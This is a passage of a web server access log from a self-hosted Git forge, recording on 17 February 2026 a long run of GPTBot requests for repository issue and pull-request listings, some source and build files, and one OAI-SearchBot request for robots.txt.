"/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:36:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:19:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftoolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 27830] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:19:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:19:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:19:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:36:41 +0000] - 200 200 - GET https 